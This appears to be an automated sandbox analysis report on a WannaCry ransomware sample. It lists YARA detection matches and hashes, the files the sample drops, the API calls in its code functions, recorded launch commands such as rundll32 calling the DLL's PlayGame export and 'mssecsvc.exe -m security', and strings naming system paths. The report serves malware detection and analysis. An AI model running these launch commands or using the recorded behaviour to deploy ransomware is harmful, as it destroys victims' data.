                Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 00000004.00000000.381614610.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000009.00000002.486575854.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000006.00000002.471882688.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000004.00000000.383003497.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000013.00000000.463303050.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000009.00000000.396301371.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000006.00000000.391018672.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000004.00000000.384240153.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000004.00000002.706767542.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000006.00000000.388277654.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000006.00000000.392238630.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000006.00000000.386126124.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 00000004.00000000.385681867.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\WINDOWS\mssecsvc.exeJump to behavior
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B03CF04_2_00B03CF0
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B03CC24_2_00B03CC2
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B028C84_2_00B028C8
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B03D364_2_00B03D36
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B03C3D4_2_00B03C3D
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B03D1F4_2_00B03D1F
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B03D4B4_2_00B03D4B
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA3CF04_2_7FEA3CF0
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA28C84_2_7FEA28C8
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA3CC24_2_7FEA3CC2
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA4C9E4_2_7FEA4C9E
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA3D4B4_2_7FEA3D4B
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA3C3D4_2_7FEA3C3D
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA3D364_2_7FEA3D36
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA3D1F4_2_7FEA3D1F
                Source: C:\Windows\tasksche.exeCode function: 19_2_00406C4019_2_00406C40
                Source: C:\Windows\tasksche.exeCode function: 19_2_00402A7619_2_00402A76
                Source: C:\Windows\tasksche.exeCode function: 19_2_00402E7E19_2_00402E7E
                Source: C:\Windows\tasksche.exeCode function: 19_2_0040350F19_2_0040350F
                Source: C:\Windows\tasksche.exeCode function: 19_2_00404C1919_2_00404C19
                Source: C:\Windows\tasksche.exeCode function: 19_2_0040541F19_2_0040541F
                Source: C:\Windows\tasksche.exeCode function: 19_2_0040379719_2_00403797
                Source: C:\Windows\tasksche.exeCode function: 19_2_004043B719_2_004043B7
                Source: C:\Windows\tasksche.exeCode function: 19_2_004031BC19_2_004031BC
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B005F2 FindCloseChangeNotification,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,FindCloseChangeNotification,FindCloseChangeNotification,4_2_00B005F2
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B0042D GetModuleHandleA,GetVersion,VirtualAlloc,FindCloseChangeNotification,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,FindCloseChangeNotification,4_2_00B0042D
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B0252F NtOpenSection,4_2_00B0252F
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B02574 NtMapViewOfSection,FindCloseChangeNotification,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,4_2_00B02574
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B02477 NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory,4_2_00B02477
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B0144A LookupPrivilegeValueA,NtAdjustPrivilegesToken,4_2_00B0144A
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B024AE lstrcpyW,lstrlenW,NtCreateSection,4_2_00B024AE
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B033E0 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,4_2_00B033E0
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B01422 LookupPrivilegeValueA,NtAdjustPrivilegesToken,4_2_00B01422
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B03405 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,4_2_00B03405
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA33E0 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,4_2_7FEA33E0
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA05F2 CloseHandle,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,CloseHandle,4_2_7FEA05F2
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA24AE lstrcpyW,lstrlenW,NtCreateSection,4_2_7FEA24AE
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA2477 NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory,4_2_7FEA2477
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA2574 NtMapViewOfSection,CloseHandle,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,4_2_7FEA2574
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA144A LookupPrivilegeValueA,NtAdjustPrivilegesToken,4_2_7FEA144A
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA252F NtOpenSection,4_2_7FEA252F
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA042D GetModuleHandleA,GetVersion,VirtualAlloc,CloseHandle,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,4_2_7FEA042D
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA1422 LookupPrivilegeValueA,NtAdjustPrivilegesToken,4_2_7FEA1422
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA3405 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,4_2_7FEA3405
                Source: mssecsvc.exe.2.drStatic PE information: Resource name: R type: PE32 executable (GUI) Intel 80386, for MS Windows
                Source: tasksche.exe.6.drStatic PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract
                Source: HFKDS6VcNO.dllVirustotal: Detection: 86%
                Source: HFKDS6VcNO.dllReversingLabs: Detection: 89%
                Source: HFKDS6VcNO.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll"
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll",#1
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\HFKDS6VcNO.dll,PlayGame
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll",#1
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll",PlayGame
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe
                Source: unknownProcess created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe -m security
                Source: C:\Windows\mssecsvc.exeProcess created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /i
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll",#1Jump to behavior
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\HFKDS6VcNO.dll,PlayGameJump to behavior
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll",PlayGameJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll",#1Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exeJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exeJump to behavior
                Source: C:\Windows\mssecsvc.exeProcess created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /iJump to behavior
                Source: C:\Windows\mssecsvc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: mssecsvc.exe.2.drBinary string: /\Device\HarddiskVolume2\Windows\Temp\avg_a01924
                Source: mssecsvc.exe.2.drBinary string: C\Device\HarddiskVolume2\Windows\SoftwareDistribution\DataStore\Logs
                Source: mssecsvc.exe.2.drBinary string: 7\Device\HarddiskVolume2\Windows\System32\CertPolEng.dll A
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
                Source: mssecsvc.exe.2.drBinary string: @\Device\HarddiskVolume2\Windows\System32\ru-RU\WinSATAPI.dll.mui
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\dmvsc.sysT
                Source: mssecsvc.exe.2.drBinary string: p\Device\HarddiskVolume2\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\History\History.IE5@
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\parvdm.sysAUH
                Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\System32\fveui.dll
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\wercplsupport.dll
                Source: mssecsvc.exe.2.drBinary string: I\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\Locationp
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\QAGENTRT.DLL
                Source: mssecsvc.exe.2.drBinary string: 0\Device\HarddiskVolume2\Windows\inf\netmscli.PNFC
                Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Cachesp
                Source: mssecsvc.exe.2.drBinary string: \\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Program Files\AVG Web TuneUp\lip.exep
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\crcdisk.sysp
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\dmvsc.sysd
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\NV_AGP.SYS
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\acpipmi.sysH
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\ndiscap.sys
                Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\cabinet.dll
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5ABCO
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\VMBusHID.sys&
                Source: mssecsvc.exe.2.drBinary string: J\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\volsnap.inf_loc
                Source: mssecsvc.exe.2.drBinary string: h\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\mapi32.dll
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\BrSerId.sys
                Source: mssecsvc.exe.2.drBinary string: +\Device\HarddiskVolume2\Windows\System32\ru_PTC
                Source: mssecsvc.exe.2.drBinary string: L\Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\LocalH
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\crcdisk.sys?
                Source: mssecsvc.exe.2.drBinary string: J\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\monitor.inf_loc
                Source: mssecsvc.exe.2.drBinary string: [\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\Windows Filtering Platform
                Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\keyboard.inf_loc
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\dmvsc.sys;
                Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnbr003.catp
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\mskssrv.sys
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\ws2ifsl.sysv
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\MTConfig.sys
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\storvsc.sys,
                Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\sppsvc.exeI
                Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\desktop.inip
                Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\PLA\System_CPU
                Source: mssecsvc.exe.2.drBinary string: F\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\Shell
                Source: mssecsvc.exe.2.drBinary string: J\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\netrass.inf_loc0D
                Source: mssecsvc.exe.2.drBinary string: t\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\amdk8.sys
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\dmvsc.sys@
                Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\System32\umrdp.dllSTRP
                Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\sppsvc.exer
                Source: mssecsvc.exe.2.drBinary string: 8\Device\HarddiskVolume2\Program Files\AVG\Av\avgcmgr.exeST
                Source: mssecsvc.exe.2.drBinary string: -\Device\HarddiskVolume2\Windows\inf\mshdc.PNFp
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\sfloppy.sysR_
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Gadget-Platform-Package~31bf3856ad364e35~x86~~6.1.7601.17514.catp
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\1394ohci.sysp
                Source: mssecsvc.exe.2.drBinary string: z\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.236.Crwl_^]
                Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\DFDWiz.exeU0IS$
                Source: mssecsvc.exe.2.drBinary string: >\Device\HarddiskVolume2\Windows\System32\ru-RU\runonce.exe.mui+
                Source: mssecsvc.exe.2.drBinary string: /\Device\HarddiskVolume2\Windows\inf\ndiscap.PNF
                Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\bthserv.dll
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\msshooks.dllp
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\intelide.sys
                Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\SoftwareDistribution
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\TsUsbGD.sys
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\ProgramData\Avg\log\AV16\shredlog.cfgp
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F94FD5F2AAEFDB64257601230509A4E9H
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\ProgramData\Avg\log\AV16\krnlapi.cfgp
                Source: mssecsvc.exe.2.drBinary string: Y\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Branding-Ultimate-Client-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
                Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\gptext.dll
